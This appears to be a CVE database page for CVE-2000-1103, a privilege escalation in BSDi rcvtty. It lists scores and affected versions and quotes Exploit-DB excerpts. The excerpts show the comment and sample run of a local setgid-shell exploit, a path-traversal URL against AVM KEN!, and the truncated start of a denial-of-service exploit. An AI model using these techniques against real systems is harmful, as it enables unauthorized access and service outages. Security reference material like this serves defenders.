CVE-2000-1103
published 2001-01-09CVE-2000-1103: rcvtty in BSD 3.0 and 4.0 does not properly drop privileges before executing a script, which allows local attackers to gain privileges by specifying an…
PriorityP423high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.94%
56.5th percentile
rcvtty in BSD 3.0 and 4.0 does not properly drop privileges before executing a script, which allows local attackers to gain privileges by specifying an alternate Trojan horse script on the command line.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bsdi | bsd_os | — | — |
| bsdi | bsd_os | — | — |
| bsdi | bsd_os | — | — |
| bsdi | bsd_os | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation
exploitdb·2000-11-21
CVE-2000-1103 BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation
BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation
---
/*
(BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[[email protected]]. this exploit
is for the rcvtty of the mh package, which is setgid=4(tty) on BSDi. this
exploit gives you egid/group=4(tty) access.
example:
bash-2.02$ id
uid=101(v9) gid=100(user) groups=100(user)
bash-2.02$ cc xrcvtty.c -o xrcvtty
bash-2.02$ ./xrcvtty
[ (BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[[email protected]]. ]
[*] /usr/contrib/mh/lib/rcvtty appears to be setgid.
[*] now making shell script to execute.
[*] done, now building and executing the command line.
[*] done, now checking for success.
[*] success, /tmp/ttysh is now setgid.
[*] finished, everything appeared to have gone successful.
[?] do you wish to enter the sgidshell now(y/n)?: y
[*] ok, executing
Exploit-DB
AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service
exploitdb·2000-04-12
CVE-2000-0262 AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service
AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/1103/info
A remote user on the local network is capable of retrieving any known file from a machine running AVM KEN!. This is accomplished by appending ../ to a URL utilizing port 3128 to escape the regular web file structure, and appending the remaining path onto the request.
eg.
http://target:3128/../../../filename.ext
A denial of service attack could also be launched against AVM KEN! by sending random characters to port 3128. A restart would be required in order to regain normal functionality.
import java.net.Socket;
import java.io.*;
/*
BARBIE - The AVM KEN! exploit
This exploit causes a crash in the AVM KEN! ISDN Proxy software.
All conections will be cut off, but the server will res
No writeups or analysis indexed.
2001-01-09
Published